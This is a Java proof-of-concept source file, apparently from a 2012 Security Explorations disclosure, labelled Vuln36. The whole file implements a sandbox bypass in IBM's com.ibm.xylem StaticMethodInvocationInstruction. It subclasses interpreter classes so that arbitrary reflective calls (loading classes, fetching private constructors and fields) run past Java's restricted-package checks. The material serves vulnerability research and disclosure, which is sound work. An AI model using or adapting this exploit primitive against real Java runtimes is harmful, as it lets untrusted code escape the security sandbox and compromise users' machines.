/*## (c) SECURITY EXPLORATIONS    2012 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* com.ibm.xylem.instructions.StaticMethodInvocationInstruction               */
/* restricted package bypass via arbitrary Method's invocation                */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.util.*;
import java.lang.reflect.Field;
import java.lang.reflect.Constructor;
import com.ibm.xylem.*;
import com.ibm.xylem.interpreter.*;
import com.ibm.xylem.codegen.*;
import com.ibm.xylem.codegen.bcel.*;
import com.ibm.xylem.instructions.*;

public class Vuln36 {

 public static class MyStaticMethodInvocationInstruction extends StaticMethodInvocationInstruction {
  String cname;
  String mname;

  public MyStaticMethodInvocationInstruction(String cname,String mname) {
   super();
   this.cname=cname;
   this.mname=mname;
  }

  public String getClassName() {
   return cname;
  }

  public String getMethodName() {
   return mname;
  }

  public Type evaluateType(Function function) {
   return new MyType(getClass());
  }  
 }

 public static class MyType extends Type {
  Class c;

  public static Object retval;

  public MyType(Class c) {
   super();
   this.c=c;
  }

  public com.ibm.xtq.bcel.generic.Type getImplementationType(BCELCodeGenerationHelper bcelcodegenerationhelper) {
   return null;
  }

  public String getDefaultValue() {
   return null;
  }

  public Type expandTypeAliases(Module module) {
   return null;
  }

  public Class getJavaType() {
   return c;
  }

  public Object createStream(Object o) {
   MyType.retval=o;

   return o;
  }
 }

 public static class MyInstruction extends Instruction {
  Object o;

  public MyInstruction(Object o) {
   super();
   this.o=o;
  }

  public Type typeCheck(TypeEnvironment typeenvironment, BindingEnvironment bindingenvironment, LinkedList linkedlist) throws TypeCheckException {
   return null;
  }

  public Type getType(TypeEnvironment typeenvironment, BindingEnvironment bindingenvironment) {
   return null;
  }

  public String generateCodeBasedOnDataFlow(DataFlowCodeGenerationHelper dataflowcodegenerationhelper, CodeGenerationTracker codegenerationtracker, String s, boolean flag) {
   return null;
  }

  public Instruction cloneWithoutTypeInformation() {
   return null;
  }

  public Instruction cloneShallow() {
   return null;
  }

  public void generateReducedForm(ReductionHelper reductionhelper, Instruction ainstruction[], BindingEnvironment bindingenvironment) {
  }

  public Type evaluateType(Function function) {
   return new MyType(o.getClass());
  }  

  public Object evaluate(Environment environment, Function function, IDebuggerInterceptor idebuggerinterceptor, boolean flag) {
   return o;
  }
 }

 static Object invoke(String cname,String mname,Object o,Object args[]) throws Throwable {
  Environment env=new Environment();
  env.m_statics.put(cname,o);

  MyInstruction iargs[]=new MyInstruction[args.length];
  for(int i=0;i<args.length;i++) {
   iargs[i]=new MyInstruction(args[i]);
  }

  MyStaticMethodInvocationInstruction msmii=new MyStaticMethodInvocationInstruction(cname,mname);
  msmii.m_parameters=iargs;

  msmii.evaluate(env,null,null,false);

  return MyType.retval;
 }

 public static Class load_class(String name) throws Throwable {
  Object args[]=new Object[1];
  args[0]=name;

  return (Class)invoke("java.lang.Class","forName",Class.forName("java.lang.Class"),args);
 }

 public static Constructor get_constructor(Class c,Class cargs[]) throws Throwable {
  Object args[]=new Object[1];
  args[0]=cargs;

  return (Constructor)invoke("java.lang.Class","getDeclaredConstructor",c,args);
 }

 public static Field get_field(Class c,String name) throws Throwable {
  Object args[]=new Object[1];
  args[0]=name;

  return (Field)invoke("java.lang.Class","getDeclaredField",c,args);
 }
}
